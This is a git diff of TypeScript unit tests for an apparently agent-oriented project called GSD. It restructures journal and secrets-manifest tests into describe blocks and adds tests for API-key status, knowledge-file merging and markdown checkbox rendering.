-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal filters by eventType", () => {
-  const base = makeTmpBase();
-  try {
+  test("filters by eventType", () => {
     emitJournalEvent(base, makeEntry({ eventType: "iteration-start", seq: 0 }));
     emitJournalEvent(base, makeEntry({ eventType: "dispatch-match", seq: 1 }));
     emitJournalEvent(base, makeEntry({ eventType: "unit-start", seq: 2 }));
@@ -220,14 +204,9 @@ test("queryJournal filters by eventType", () => {
     const results = queryJournal(base, { eventType: "dispatch-match" });
     assert.equal(results.length, 2);
     assert.ok(results.every(e => e.eventType === "dispatch-match"));
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal filters by unitId (from data.unitId)", () => {
-  const base = makeTmpBase();
-  try {
+  test("filters by unitId (from data.unitId)", () => {
     emitJournalEvent(
       base,
       makeEntry({ seq: 0, data: { unitId: "M001/S01/T01" } }),
@@ -249,14 +228,9 @@ test("queryJournal filters by unitId (from data.unitId)", () => {
         e => (e.data as Record<string, unknown>)?.unitId === "M001/S01/T01",
       ),
     );
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal filters by time range (after/before)", () => {
-  const base = makeTmpBase();
-  try {
+  test("filters by time range (after/before)", () => {
     emitJournalEvent(base, makeEntry({ ts: "2025-03-20T08:00:00.000Z", seq: 0 }));
     emitJournalEvent(base, makeEntry({ ts: "2025-03-21T10:00:00.000Z", seq: 1 }));
     emitJournalEvent(base, makeEntry({ ts: "2025-03-21T15:00:00.000Z", seq: 2 }));
@@ -276,14 +250,9 @@ test("queryJournal filters by time range (after/before)", () => {
       before: "2025-03-21T23:59:59.000Z",
     });
     assert.equal(rangeResults.length, 2, "2 entries within 2025-03-21");
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal combines multiple filters", () => {
-  const base = makeTmpBase();
-  try {
+  test("combines multiple filters", () => {
     emitJournalEvent(
       base,
       makeEntry({ flowId: "flow-aaa", eventType: "unit-start", seq: 0 }),
@@ -304,25 +273,9 @@ test("queryJournal combines multiple filters", () => {
     assert.equal(results.length, 1);
     assert.equal(results[0].flowId, "flow-aaa");
     assert.equal(results[0].eventType, "unit-start");
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal on nonexistent directory returns empty array", () => {
-  const base = join(tmpdir(), `gsd-journal-test-${randomUUID()}`);
-  // Don't create anything
-  try {
-    const results = queryJournal(base);
-    assert.deepEqual(results, []);
-  } finally {
-    cleanup(base);
-  }
-});
-
-test("queryJournal skips malformed JSON lines gracefully", () => {
-  const base = makeTmpBase();
-  try {
+  test("skips malformed JSON lines gracefully", () => {
     const journalDir = join(base, ".gsd", "journal");
     mkdirSync(journalDir, { recursive: true });
 
@@ -335,14 +288,9 @@ test("queryJournal skips malformed JSON lines gracefully", () => {
     assert.equal(results.length, 2, "Should skip the malformed line");
     assert.equal(results[0].seq, 0);
     assert.equal(results[1].seq, 1);
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal reads across multiple daily files", () => {
-  const base = makeTmpBase();
-  try {
+  test("reads across multiple daily files", () => {
     emitJournalEvent(base, makeEntry({ ts: "2025-03-20T12:00:00.000Z", seq: 0 }));
     emitJournalEvent(base, makeEntry({ ts: "2025-03-21T12:00:00.000Z", seq: 1 }));
     emitJournalEvent(base, makeEntry({ ts: "2025-03-22T12:00:00.000Z", seq: 2 }));
@@ -353,14 +301,9 @@ test("queryJournal reads across multiple daily files", () => {
     assert.equal(results[0].ts, "2025-03-20T12:00:00.000Z");
     assert.equal(results[1].ts, "2025-03-21T12:00:00.000Z");
     assert.equal(results[2].ts, "2025-03-22T12:00:00.000Z");
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal filters by rule", () => {
-  const base = makeTmpBase();
-  try {
+  test("filters by rule", () => {
     emitJournalEvent(
       base,
       makeEntry({ seq: 0, eventType: "dispatch-match", rule: "dispatch-task" }),
@@ -380,7 +323,19 @@ test("queryJournal filters by rule", () => {
       results.every(e => e.rule === "dispatch-task"),
       "All results should have rule === 'dispatch-task'",
     );
-  } finally {
-    cleanup(base);
-  }
+  });
+});
+
+describe("queryJournal — nonexistent directory", () => {
+  let base: string;
+  beforeEach(() => {
+    base = join(tmpdir(), `gsd-journal-test-${randomUUID()}`);
+    // Don't create anything
+  });
+  afterEach(() => { cleanup(base); });
+
+  test("on nonexistent directory returns empty array", () => {
+    const results = queryJournal(base);
+    assert.deepEqual(results, []);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/key-manager.test.ts b/src/resources/extensions/gsd/tests/key-manager.test.ts
index 54d66ae19..785c34945 100644
--- a/src/resources/extensions/gsd/tests/key-manager.test.ts
+++ b/src/resources/extensions/gsd/tests/key-manager.test.ts
@@ -189,7 +189,22 @@ test("getAllKeyStatuses detects empty keys as not configured", () => {
   const statuses = getAllKeyStatuses(auth);
   const groq = statuses.find((s) => s.provider.id === "groq");
   assert.equal(groq?.configured, false);
-  assert.ok(groq?.description.includes("empty"));
+  // Empty-key entries are filtered out, so provider appears unconfigured
+  assert.equal(groq?.source, "none");
+});
+
+test("getAllKeyStatuses finds valid keys even when empty-key entry exists at index 0", () => {
+  const auth = makeAuth({
+    groq: [
+      { type: "api_key", key: "" },
+      { type: "api_key", key: "gsk-real-key" },
+    ],
+  });
+  const statuses = getAllKeyStatuses(auth);
+  const groq = statuses.find((s) => s.provider.id === "groq");
+  assert.equal(groq?.configured, true);
+  assert.equal(groq?.source, "auth.json");
+  assert.equal(groq?.credentialCount, 1); // only the valid key counts
 });
 
 test("getAllKeyStatuses detects env var keys", () => {
diff --git a/src/resources/extensions/gsd/tests/knowledge.test.ts b/src/resources/extensions/gsd/tests/knowledge.test.ts
index 5fa832577..a48e936f2 100644
--- a/src/resources/extensions/gsd/tests/knowledge.test.ts
+++ b/src/resources/extensions/gsd/tests/knowledge.test.ts
@@ -6,6 +6,7 @@
  * - resolveGsdRootFile resolves KNOWLEDGE paths correctly
  * - inlineGsdRootFile works with the KNOWLEDGE key
  * - before_agent_start hook includes/omits knowledge block appropriately
+ * - loadKnowledgeBlock merges global and project knowledge correctly
  */
 
 import test from 'node:test';
@@ -16,6 +17,7 @@ import { tmpdir } from 'node:os';
 import { GSD_ROOT_FILES, resolveGsdRootFile } from '../paths.ts';
 import { inlineGsdRootFile } from '../auto-prompts.ts';
 import { appendKnowledge } from '../files.ts';
+import { loadKnowledgeBlock } from '../bootstrap/system-context.ts';
 
 // ─── KNOWLEDGE is registered in GSD_ROOT_FILES ─────────────────────────────
 
@@ -159,3 +161,90 @@ test('knowledge: appendKnowledge handles lesson type', async () => {
 
   rmSync(tmp, { recursive: true, force: true });
 });
+
+// ─── loadKnowledgeBlock — global + project merge ────────────────────────────
+
+test('loadKnowledgeBlock: returns empty block when neither file exists', () => {
+  const tmp = realpathSync(mkdtempSync(join(tmpdir(), 'gsd-kb-')));
+  const gsdHome = join(tmp, 'home');
+  const cwd = join(tmp, 'project');
+  mkdirSync(join(cwd, '.gsd'), { recursive: true });
+  mkdirSync(join(gsdHome, 'agent'), { recursive: true });
+
+  const result = loadKnowledgeBlock(gsdHome, cwd);
+  assert.strictEqual(result.block, '');
+  assert.strictEqual(result.globalSizeKb, 0);
+
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKnowledgeBlock: uses project knowledge alone when no global file', () => {
+  const tmp = realpathSync(mkdtempSync(join(tmpdir(), 'gsd-kb-')));
+  const gsdHome = join(tmp, 'home');
+  const cwd = join(tmp, 'project');
+  mkdirSync(join(cwd, '.gsd'), { recursive: true });
+  mkdirSync(join(gsdHome, 'agent'), { recursive: true });
+  writeFileSync(join(cwd, '.gsd', 'KNOWLEDGE.md'), 'K001: Use real DB');
+
+  const result = loadKnowledgeBlock(gsdHome, cwd);
+  assert.ok(result.block.includes('[KNOWLEDGE — Rules, patterns, and lessons learned]'));
+  assert.ok(result.block.includes('## Project Knowledge'));
+  assert.ok(result.block.includes('K001: Use real DB'));
+  assert.ok(!result.block.includes('## Global Knowledge'));
+  assert.strictEqual(result.globalSizeKb, 0);
+
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKnowledgeBlock: uses global knowledge alone when no project file', () => {
+  const tmp = realpathSync(mkdtempSync(join(tmpdir(), 'gsd-kb-')));
+  const gsdHome = join(tmp, 'home');
+  const cwd = join(tmp, 'project');
+  mkdirSync(join(cwd, '.gsd'), { recursive: true });
+  mkdirSync(join(gsdHome, 'agent'), { recursive: true });
+  writeFileSync(join(gsdHome, 'agent', 'KNOWLEDGE.md'), 'G001: Respond in English');
+
+  const result = loadKnowledgeBlock(gsdHome, cwd);
+  assert.ok(result.block.includes('[KNOWLEDGE — Rules, patterns, and lessons learned]'));
+  assert.ok(result.block.includes('## Global Knowledge'));
+  assert.ok(result.block.includes('G001: Respond in English'));
+  assert.ok(!result.block.includes('## Project Knowledge'));
+  assert.ok(result.globalSizeKb > 0);
+
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKnowledgeBlock: merges global before project when both exist', () => {
+  const tmp = realpathSync(mkdtempSync(join(tmpdir(), 'gsd-kb-')));
+  const gsdHome = join(tmp, 'home');
+  const cwd = join(tmp, 'project');
+  mkdirSync(join(cwd, '.gsd'), { recursive: true });
+  mkdirSync(join(gsdHome, 'agent'), { recursive: true });
+  writeFileSync(join(gsdHome, 'agent', 'KNOWLEDGE.md'), 'G001: Global rule');
+  writeFileSync(join(cwd, '.gsd', 'KNOWLEDGE.md'), 'K001: Project rule');
+
+  const result = loadKnowledgeBlock(gsdHome, cwd);
+  assert.ok(result.block.includes('## Global Knowledge'));
+  assert.ok(result.block.includes('## Project Knowledge'));
+  assert.ok(result.block.includes('G001: Global rule'));
+  assert.ok(result.block.includes('K001: Project rule'));
+  // Global section appears before project section
+  assert.ok(result.block.indexOf('## Global Knowledge') < result.block.indexOf('## Project Knowledge'));
+
+  rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKnowledgeBlock: reports globalSizeKb above 4KB threshold', () => {
+  const tmp = realpathSync(mkdtempSync(join(tmpdir(), 'gsd-kb-')));
+  const gsdHome = join(tmp, 'home');
+  const cwd = join(tmp, 'project');
+  mkdirSync(join(cwd, '.gsd'), { recursive: true });
+  mkdirSync(join(gsdHome, 'agent'), { recursive: true });
+  // Write > 4KB of content
+  writeFileSync(join(gsdHome, 'agent', 'KNOWLEDGE.md'), 'x'.repeat(5000));
+
+  const result = loadKnowledgeBlock(gsdHome, cwd);
+  assert.ok(result.globalSizeKb > 4, `expected > 4KB, got ${result.globalSizeKb}`);
+
+  rmSync(tmp, { recursive: true, force: true });
+});
diff --git a/src/resources/extensions/gsd/tests/manifest-status.test.ts b/src/resources/extensions/gsd/tests/manifest-status.test.ts
index 3020caa87..646eccec0 100644
--- a/src/resources/extensions/gsd/tests/manifest-status.test.ts
+++ b/src/resources/extensions/gsd/tests/manifest-status.test.ts
@@ -8,7 +8,7 @@
  * Uses temp directories with real .gsd/milestones/M001/ structure.
  */
 
-import test from 'node:test';
+import { describe, test, beforeEach, afterEach } from 'node:test';
 import assert from 'node:assert/strict';
 import { mkdirSync, writeFileSync, rmSync } from 'node:fs';
 import { join } from 'node:path';
@@ -30,12 +30,21 @@ function writeManifest(base: string, content: string): void {
 
 // ─── Mixed statuses ──────────────────────────────────────────────────────────
 
-test('getManifestStatus: mixed statuses — categorizes entries correctly', async () => {
-  const tmp = makeTempDir('manifest-mixed');
-  const savedVal = process.env.GSD_TEST_EXISTING_KEY_001;
-  try {
+describe('getManifestStatus: mixed statuses', () => {
+  let tmp: string;
+  let savedVal: string | undefined;
+  beforeEach(() => {
+    tmp = makeTempDir('manifest-mixed');
+    savedVal = process.env.GSD_TEST_EXISTING_KEY_001;
     process.env.GSD_TEST_EXISTING_KEY_001 = 'some-value';
+  });
+  afterEach(() => {
+    delete process.env.GSD_TEST_EXISTING_KEY_001;
+    if (savedVal !== undefined) process.env.GSD_TEST_EXISTING_KEY_001 = savedVal;
+    rmSync(tmp, { recursive: true, force: true });
+  });
 
+  test('categorizes entries correctly', async () => {
     writeManifest(tmp, `# Secrets Manifest
 
 **Milestone:** M001
@@ -80,18 +89,17 @@ test('getManifestStatus: mixed statuses — categorizes entries correctly', asyn
     assert.deepStrictEqual(result!.collected, ['COLLECTED_KEY']);
     assert.deepStrictEqual(result!.skipped, ['SKIPPED_KEY']);
     assert.deepStrictEqual(result!.existing, ['GSD_TEST_EXISTING_KEY_001']);
-  } finally {
-    delete process.env.GSD_TEST_EXISTING_KEY_001;
-    if (savedVal !== undefined) process.env.GSD_TEST_EXISTING_KEY_001 = savedVal;
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  });
 });
 
 // ─── All pending ─────────────────────────────────────────────────────────────
 
-test('getManifestStatus: all pending — 3 pending entries, none in env', async () => {
-  const tmp = makeTempDir('manifest-pending');
-  try {
+describe('getManifestStatus: simple temp dir tests', () => {
+  let tmp: string;
+  beforeEach(() => { tmp = makeTempDir('manifest-test'); });
+  afterEach(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  test('all pending — 3 pending entries, none in env', async () => {
     // Ensure none of these are in process.env
     delete process.env.PEND_A;
     delete process.env.PEND_B;
@@ -133,16 +141,11 @@ test('getManifestStatus: all pending — 3 pending entries, none in env', async
     assert.deepStrictEqual(result!.collected, []);
     assert.deepStrictEqual(result!.skipped, []);
     assert.deepStrictEqual(result!.existing, []);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-// ─── All collected ───────────────────────────────────────────────────────────
+  // ─── All collected ───────────────────────────────────────────────────────────
 
-test('getManifestStatus: all collected — 2 collected entries, none in env', async () => {
-  const tmp = makeTempDir('manifest-collected');
-  try {
+  test('all collected — 2 collected entries, none in env', async () => {
     delete process.env.COLL_X;
     delete process.env.COLL_Y;
 
@@ -174,64 +177,19 @@ test('getManifestStatus: all collected — 2 collected entries, none in env', as
     assert.deepStrictEqual(result!.collected, ['COLL_X', 'COLL_Y']);
     assert.deepStrictEqual(result!.skipped, []);
     assert.deepStrictEqual(result!.existing, []);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-// ─── Key in env overrides manifest status ────────────────────────────────────
+  // ─── Missing manifest ────────────────────────────────────────────────────────
 
-test('getManifestStatus: key in env overrides manifest status — collected key in env goes to existing', async () => {
-  const tmp = makeTempDir('manifest-override');
-  const savedVal = process.env.GSD_TEST_OVERRIDE_KEY;
-  try {
-    process.env.GSD_TEST_OVERRIDE_KEY = 'already-here';
-
-    writeManifest(tmp, `# Secrets Manifest
-
-**Milestone:** M001
-**Generated:** 2025-06-20T10:00:00Z
-
-### GSD_TEST_OVERRIDE_KEY
-
-**Service:** Override
-**Status:** collected
-**Destination:** dotenv
-
-1. Was collected but now in env
-`);
-
-    const result = await getManifestStatus(tmp, 'M001');
-    assert.notStrictEqual(result, null);
-    assert.deepStrictEqual(result!.pending, []);
-    assert.deepStrictEqual(result!.collected, []);
-    assert.deepStrictEqual(result!.skipped, []);
-    assert.deepStrictEqual(result!.existing, ['GSD_TEST_OVERRIDE_KEY']);
-  } finally {
-    delete process.env.GSD_TEST_OVERRIDE_KEY;
-    if (savedVal !== undefined) process.env.GSD_TEST_OVERRIDE_KEY = savedVal;
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-// ─── Missing manifest ────────────────────────────────────────────────────────
-
-test('getManifestStatus: missing manifest — returns null', async () => {
-  const tmp = makeTempDir('manifest-missing');
-  try {
+  test('missing manifest — returns null', async () => {
     // No .gsd directory at all
     const result = await getManifestStatus(tmp, 'M001');
     assert.strictEqual(result, null);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-// ─── Empty manifest (no entries) ─────────────────────────────────────────────
+  // ─── Empty manifest (no entries) ─────────────────────────────────────────────
 
-test('getManifestStatus: empty manifest — exists but no H3 sections', async () => {
-  const tmp = makeTempDir('manifest-empty');
-  try {
+  test('empty manifest — exists but no H3 sections', async () => {
     writeManifest(tmp, `# Secrets Manifest
 
 **Milestone:** M001
@@ -244,16 +202,11 @@ test('getManifestStatus: empty manifest — exists but no H3 sections', async ()
     assert.deepStrictEqual(result!.collected, []);
     assert.deepStrictEqual(result!.skipped, []);
     assert.deepStrictEqual(result!.existing, []);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-// ─── Env via .env file (not just process.env) ────────────────────────────────
+  // ─── Env via .env file (not just process.env) ────────────────────────────────
 
-test('getManifestStatus: key in .env file counts as existing', async () => {
-  const tmp = makeTempDir('manifest-dotenv');
-  try {
+  test('key in .env file counts as existing', async () => {
     delete process.env.DOTENV_ONLY_KEY;
 
     writeManifest(tmp, `# Secrets Manifest
@@ -277,7 +230,45 @@ test('getManifestStatus: key in .env file counts as existing', async () => {
     assert.notStrictEqual(result, null);
     assert.deepStrictEqual(result!.existing, ['DOTENV_ONLY_KEY']);
     assert.deepStrictEqual(result!.pending, []);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  });
+});
+
+// ─── Key in env overrides manifest status ────────────────────────────────────
+
+describe('getManifestStatus: key in env overrides manifest status', () => {
+  let tmp: string;
+  let savedVal: string | undefined;
+  beforeEach(() => {
+    tmp = makeTempDir('manifest-override');
+    savedVal = process.env.GSD_TEST_OVERRIDE_KEY;
+    process.env.GSD_TEST_OVERRIDE_KEY = 'already-here';
+  });
+  afterEach(() => {
+    delete process.env.GSD_TEST_OVERRIDE_KEY;
+    if (savedVal !== undefined) process.env.GSD_TEST_OVERRIDE_KEY = savedVal;
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  test('collected key in env goes to existing', async () => {
+    writeManifest(tmp, `# Secrets Manifest
+
+**Milestone:** M001
+**Generated:** 2025-06-20T10:00:00Z
+
+### GSD_TEST_OVERRIDE_KEY
+
+**Service:** Override
+**Status:** collected
+**Destination:** dotenv
+
+1. Was collected but now in env
+`);
+
+    const result = await getManifestStatus(tmp, 'M001');
+    assert.notStrictEqual(result, null);
+    assert.deepStrictEqual(result!.pending, []);
+    assert.deepStrictEqual(result!.collected, []);
+    assert.deepStrictEqual(result!.skipped, []);
+    assert.deepStrictEqual(result!.existing, ['GSD_TEST_OVERRIDE_KEY']);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/markdown-renderer.test.ts b/src/resources/extensions/gsd/tests/markdown-renderer.test.ts
new file mode 100644
index 000000000..83f47c49a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/markdown-renderer.test.ts
@@ -0,0 +1,1161 @@
+import * as path from 'node:path';
+import * as os from 'node:os';
+import * as fs from 'node:fs';
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  insertArtifact,
+  getArtifact,
+  getAllMilestones,
+  getMilestoneSlices,
+  getSliceTasks,
+  updateSliceStatus,
+  _getAdapter,
+} from '../gsd-db.ts';
+import {
+  renderRoadmapCheckboxes,
+  renderPlanCheckboxes,
+  renderTaskSummary,
+  renderSliceSummary,
+  renderAllFromDb,
+  renderPlanFromDb,
+  renderTaskPlanFromDb,
+  detectStaleRenders,
+  repairStaleRenders,
+} from '../markdown-renderer.ts';
+import {
+  parseRoadmap,
+  parsePlan,
+} from '../parsers-legacy.ts';
+import {
+  parseSummary,
+  parseTaskPlanFile,
+  clearParseCache,
+} from '../files.ts';
+import { clearPathCache, _clearGsdRootCache } from '../paths.ts';
+import { invalidateStateCache } from '../state.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function makeTmpDir(): string {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-renderer-'));
+  fs.mkdirSync(path.join(dir, '.gsd'), { recursive: true });
+  return dir;
+}
+
+function cleanupDir(dir: string): void {
+  try {
+    fs.rmSync(dir, { recursive: true, force: true });
+  } catch { /* swallow */ }
+}
+
+function clearAllCaches(): void {
+  clearParseCache();
+  clearPathCache();
+  _clearGsdRootCache();
+  invalidateStateCache();
+}
+
+/**
+ * Create on-disk directory structure for a milestone/slice/task tree
+ * so that path resolvers work correctly.
+ */
+function scaffoldDirs(tmpDir: string, mid: string, sliceIds: string[]): void {
+  const msDir = path.join(tmpDir, '.gsd', 'milestones', mid);
+  fs.mkdirSync(msDir, { recursive: true });
+
+  for (const sid of sliceIds) {
+    const sliceDir = path.join(msDir, 'slices', sid);
+    fs.mkdirSync(path.join(sliceDir, 'tasks'), { recursive: true });
+  }
+}
+
+// ─── Fixture: Roadmap Template ────────────────────────────────────────────
+
+function makeRoadmapContent(slices: Array<{ id: string; title: string; done: boolean }>): string {
+  const lines: string[] = [];
+  lines.push('# M001 Roadmap');
+  lines.push('');
+  lines.push('**Vision:** Test milestone');
+  lines.push('');
+  lines.push('## Slices');
+  lines.push('');
+  for (const s of slices) {
+    const checkbox = s.done ? '[x]' : '[ ]';
+    lines.push(`- ${checkbox} **${s.id}: ${s.title}** \`risk:medium\` \`depends:[]\``);
+  }
+  lines.push('');
+  return lines.join('\n');
+}
+
+// ─── Fixture: Plan Template ───────────────────────────────────────────────
+
+function makePlanContent(
+  sliceId: string,
+  tasks: Array<{ id: string; title: string; done: boolean }>,
+): string {
+  const lines: string[] = [];
+  lines.push(`# ${sliceId}: Test Slice`);
+  lines.push('');
+  lines.push('**Goal:** Test slice goal');
+  lines.push('**Demo:** Test demo');
+  lines.push('');
+  lines.push('## Must-Haves');
+  lines.push('');
+  lines.push('- Everything works');
+  lines.push('');
+  lines.push('## Tasks');
+  lines.push('');
+  for (const t of tasks) {
+    const checkbox = t.done ? '[x]' : '[ ]';
+    lines.push(`- ${checkbox} **${t.id}: ${t.title}** \`est:1h\``);
+  }
+  lines.push('');
+  return lines.join('\n');
+}
+
+// ─── Fixture: Task Summary Template ───────────────────────────────────────
+
+function makeTaskSummaryContent(taskId: string): string {
+  return [
+    '---',
+    `id: ${taskId}`,
+    'parent: S01',
+    'milestone: M001',
+    'duration: 45m',
+    'verification_result: all-pass',
+    `completed_at: ${new Date().toISOString()}`,
+    'blocker_discovered: false',
+    'provides: []',
+    'requires: []',
+    'affects: []',
+    'key_files:',
+    '  - src/test.ts',
+    'key_decisions: []',
+    'patterns_established: []',
+    'drill_down_paths: []',
+    'observability_surfaces: []',
+    '---',
+    '',
+    `# ${taskId}: Test Task Summary`,
+    '',
+    '**Implemented test functionality**',
+    '',
+    '## What Happened',
+    '',
+    'Built the test feature.',
+    '',
+    '## Deviations',
+    '',
+    'None.',
+    '',
+    '## Files Created/Modified',
+    '',
+    '- `src/test.ts` — main implementation',
+    '',
+    '## Verification Evidence',
+    '',
+    '| Command | Exit | Verdict | Duration |',
+    '|---------|------|---------|----------|',
+    '| `npm test` | 0 | ✅ pass | 2.1s |',
+    '',
+  ].join('\n');
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// DB Accessor Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: DB accessor basics ──', () => {
+  openDatabase(':memory:');
+
+  // getAllMilestones — empty
+  const empty = getAllMilestones();
+  assert.deepStrictEqual(empty.length, 0, 'getAllMilestones returns empty when no milestones');
+
+  // Insert and retrieve
+  insertMilestone({ id: 'M001', title: 'Test MS', status: 'active' });
+  insertMilestone({ id: 'M002', title: 'Second MS', status: 'active' });
+
+  const all = getAllMilestones();
+  assert.deepStrictEqual(all.length, 2, 'getAllMilestones returns 2 milestones');
+  assert.deepStrictEqual(all[0].id, 'M001', 'first milestone is M001');
+  assert.deepStrictEqual(all[1].id, 'M002', 'second milestone is M002');
+  assert.deepStrictEqual(all[0].title, 'Test MS', 'milestone title correct');
+  assert.deepStrictEqual(all[0].status, 'active', 'milestone status correct');
+
+  // getMilestoneSlices — empty
+  const noSlices = getMilestoneSlices('M001');
+  assert.deepStrictEqual(noSlices.length, 0, 'getMilestoneSlices returns empty when no slices');
+
+  // Insert slices and retrieve
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice 1', status: 'complete' });
+  insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Slice 2', status: 'pending' });
+  insertSlice({ id: 'S01', milestoneId: 'M002', title: 'M2 Slice', status: 'pending' });
+
+  const m1Slices = getMilestoneSlices('M001');
+  assert.deepStrictEqual(m1Slices.length, 2, 'M001 has 2 slices');
+  assert.deepStrictEqual(m1Slices[0].id, 'S01', 'first slice is S01');
+  assert.deepStrictEqual(m1Slices[0].status, 'complete', 'S01 status is complete');
+  assert.deepStrictEqual(m1Slices[1].id, 'S02', 'second slice is S02');
+  assert.deepStrictEqual(m1Slices[1].status, 'pending', 'S02 status is pending');
+
+  const m2Slices = getMilestoneSlices('M002');
+  assert.deepStrictEqual(m2Slices.length, 1, 'M002 has 1 slice');
+
+  closeDatabase();
+});
+
+test('── markdown-renderer: getArtifact accessor ──', () => {
+  openDatabase(':memory:');
+
+  // Not found
+  const missing = getArtifact('nonexistent/path');
+  assert.deepStrictEqual(missing, null, 'getArtifact returns null for missing path');
+
+  // Insert and retrieve
+  insertArtifact({
+    path: 'milestones/M001/M001-ROADMAP.md',
+    artifact_type: 'ROADMAP',
+    milestone_id: 'M001',
+    slice_id: null,
+    task_id: null,
+    full_content: '# Roadmap content',
+  });
+
+  const found = getArtifact('milestones/M001/M001-ROADMAP.md');
+  assert.ok(found !== null, 'getArtifact returns non-null for existing path');
+  assert.deepStrictEqual(found!.artifact_type, 'ROADMAP', 'artifact type correct');
+  assert.deepStrictEqual(found!.milestone_id, 'M001', 'milestone_id correct');
+  assert.deepStrictEqual(found!.full_content, '# Roadmap content', 'content correct');
+
+  closeDatabase();
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Roadmap Checkbox Round-Trip
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: renderRoadmapCheckboxes round-trip ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01', 'S02']);
+
+    // Seed DB with milestone and slices
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Core setup', status: 'complete' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Rendering', status: 'pending' });
+
+    // Write a roadmap file on disk with BOTH slices unchecked
+    const roadmapContent = makeRoadmapContent([
+      { id: 'S01', title: 'Core setup', done: false },
+      { id: 'S02', title: 'Rendering', done: false },
+    ]);
+    const roadmapPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    fs.writeFileSync(roadmapPath, roadmapContent);
+    clearAllCaches();
+
+    // Render — should set S01 [x] and leave S02 [ ]
+    const ok = await renderRoadmapCheckboxes(tmpDir, 'M001');
+    assert.ok(ok, 'renderRoadmapCheckboxes returns true');
+
+    // Read rendered file and parse
+    const rendered = fs.readFileSync(roadmapPath, 'utf-8');
+    clearAllCaches();
+    const parsed = parseRoadmap(rendered);
+
+    assert.deepStrictEqual(parsed.slices.length, 2, 'roadmap has 2 slices after render');
+
+    const s01 = parsed.slices.find(s => s.id === 'S01');
+    const s02 = parsed.slices.find(s => s.id === 'S02');
+    assert.ok(!!s01, 'S01 found in parsed roadmap');
+    assert.ok(!!s02, 'S02 found in parsed roadmap');
+    assert.ok(s01!.done, 'S01 is checked (done) after render');
+    assert.ok(!s02!.done, 'S02 is unchecked (pending) after render');
+
+    // Verify artifact stored in DB
+    const artifact = getArtifact('milestones/M001/M001-ROADMAP.md');
+    assert.ok(artifact !== null, 'roadmap artifact stored in DB after render');
+    assert.ok(artifact!.full_content.includes('[x] **S01:'), 'DB artifact has S01 checked');
+    assert.ok(artifact!.full_content.includes('[ ] **S02:'), 'DB artifact has S02 unchecked');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+test('── markdown-renderer: renderRoadmapCheckboxes bidirectional ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01', 'S02']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    // S01 is PENDING in DB, but checked on disk — should be unchecked
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Core setup', status: 'pending' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Rendering', status: 'complete' });
+
+    // Write roadmap with S01 checked and S02 unchecked (opposite of DB state)
+    const roadmapContent = makeRoadmapContent([
+      { id: 'S01', title: 'Core setup', done: true },
+      { id: 'S02', title: 'Rendering', done: false },
+    ]);
+    const roadmapPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    fs.writeFileSync(roadmapPath, roadmapContent);
+    clearAllCaches();
+
+    const ok = await renderRoadmapCheckboxes(tmpDir, 'M001');
+    assert.ok(ok, 'bidirectional render returns true');
+
+    const rendered = fs.readFileSync(roadmapPath, 'utf-8');
+    clearAllCaches();
+    const parsed = parseRoadmap(rendered);
+
+    const s01 = parsed.slices.find(s => s.id === 'S01');
+    const s02 = parsed.slices.find(s => s.id === 'S02');
+    assert.ok(!s01!.done, 'S01 unchecked (DB says pending, was checked on disk)');
+    assert.ok(s02!.done, 'S02 checked (DB says complete, was unchecked on disk)');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
